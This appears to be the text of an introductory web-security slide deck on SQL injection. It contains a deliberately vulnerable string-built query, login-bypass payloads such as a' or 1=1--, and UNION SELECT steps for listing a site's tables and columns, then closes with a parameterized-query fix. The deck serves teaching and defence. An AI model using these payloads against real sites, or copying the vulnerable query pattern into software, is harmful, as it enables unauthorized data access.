web app security part 1
Web Application Security
By
Noah Franklin J
Session Flow
Copy Rights to Noah Franklin J
• What is Web Application Security?
• Security Misconceptions
• Reasons for Attacking Web Applications
• OWASP Top 10 Vulnerabilities
• Security guidelines
• Web Application Security checklist
Web Application Setup
[Diagram: a web application's attack surface. Network layer: Firewall, Hardened OS, Web Server, App Server, Firewall. Application layer: Custom Code in front of Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce and Bus. Functions, with back ends Databases, Legacy Systems, Web Services, Directories, Human Resrcs and Billing. An application attack travels through the network layer into the application layer; an Insider is shown attacking from within.]
Application Layer
• Attacker sends attacks inside valid HTTP requests
• Your custom code is tricked into doing something it should not
• Security requires software development expertise, not signatures
Network Layer
• Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks inside HTTP requests.
• Security relies on signature databases
Reasons for Attacking Web Apps
Web Application Threats
Web Application Working
[Diagram: the attacker's HTTP request passes through the Custom Code (in front of Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce, Bus. Functions) to the Database.]
1. Attacker sends data containing SQL fragments: the attacker enters SQL fragments into a web page that uses input in a query
2. Application sends modified query to database, which executes it
3. Attacker views unauthorized data
EXAMPLE: $sql = "SELECT * FROM table WHERE id = '" . $_REQUEST['id'] . "'";
[Diagram: the same stack as the setup slide. Network layer: Firewall, Hardened OS, Web Server, App Server, Firewall. Application layer: Custom Code in front of Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce, Bus. Functions; back ends: Databases, Legacy Systems, Web Services, Directories, Human Resrcs, Billing. Flow: HTTP request -> SQL query -> DB Table -> HTTP response.]
Injected query: "SELECT * FROM accounts WHERE acct='' OR 1=1--'"
Leaked HTTP response: Account Summary, Acct: 5424-6066-2134-4334, followed by Account: / SKU: rows
1. Application presents a form to the attacker, all via SSL
2. Attacker sends an attack in the form data
3. Application forwards attack to the database in a SQL query
4. Database runs query containing attack and sends encrypted results back to application
5. Application decrypts data as normal and sends results to the user
Injection Flaw
What is SQL Injection?
Insertion of SQL statements into application inputs to corrupt, exploit, or otherwise damage an application database.
Most commonly done directly through web forms, but can be directed through URL hacking, request hacking using debugging tools, or using bots that emulate browsers and manipulate web requests.
What is a SQL Injection Attack?
Many web applications take user input from a form
A SQL injection attack involves placing SQL statements in the user input
SQL Basics
• Standard SQL commands such as "Select", "Insert", "Update", "Delete", "Create", and "Drop" can be used to accomplish almost everything that one needs to do with a database.
Types of SQL injection
• Direct injection. Example: ' or 1=1-- and true conditions
• Indirect injection
Integer based
String based
Error based
Blind
Xml injection
Double string
Program Behind Login Page
if (username == franky) && (password == 12345)
    printf("Welcome to Email ");
else
{
    printf("Invalid Username or password");
}
Program Behind Login Page
if (username == a' or 1=1--) && (password == a' or 1=1--)
    printf("Welcome to Email ");
else
{
    printf("Invalid Username or password");
}
SQL Injection
SQL Basic Demo
SQL Injection Extracting Database
Example : www.site.com/index.php?id=1
Add ' or /* after id=1 to check whether the site is vulnerable or not.
If the site gives an error or a blank page, then the site is vulnerable to SQL injection.
www.site.com/index.php?id=1+union+all+select+1,table_name,3,4,5,6,7+from+information_schema.tables
The above query gives the names of the tables stored in the database.
www.site.com/index.php?id=1+union+all+select+1,column_name,3,4,5,6,7+from+information_schema.columns+where+table_schema=char()
The above query gives the names of the columns stored in the database.
www.site.com/index.php?id=1+union+all+select+1,column_name,3,4,5,6,7+from+information_schema.columns
The above query gives the names of the columns stored in the database.
SQL Injection
SQL Demo
Countermeasure
• Check the input provided to database queries
• Validate and sanitize every user variable passed to the database
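The login check from the "Program Behind Login Page" slides and the countermeasure above, as an added example that is not part of the original deck: the string-built query is the vulnerable form shown on the slides, the parameterized query is the fix. The users table and its two sample rows are constructed for the demo; SQLite is used in place of the deck's database.

```python
import sqlite3

# Constructed sample data (not from the slides): a tiny users table.
USERS = [("franky", "12345"), ("alice", "s3cret")]


def setup_db():
    """Create an in-memory SQLite database seeded with the sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Mirrors the slide's string-built query: input is pasted into the SQL text,
    so a quote in the input changes the query's structure."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    """Parameterized query: the driver passes values separately from the SQL
    text, so the input can only ever be compared as data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def demo():
    """Run a valid login and the slide's bypass input through both versions."""
    conn = setup_db()
    payload = "a' or 1=1--"   # the login-bypass input shown on the slide
    return {
        "valid_vuln": login_vulnerable(conn, "franky", "12345"),
        "valid_safe": login_safe(conn, "franky", "12345"),
        # 'a' or 1=1 is true for every row; -- comments out the password check
        "attack_vuln": login_vulnerable(conn, payload, payload),
        # the same text is compared literally as a username: no match
        "attack_safe": login_safe(conn, payload, payload),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```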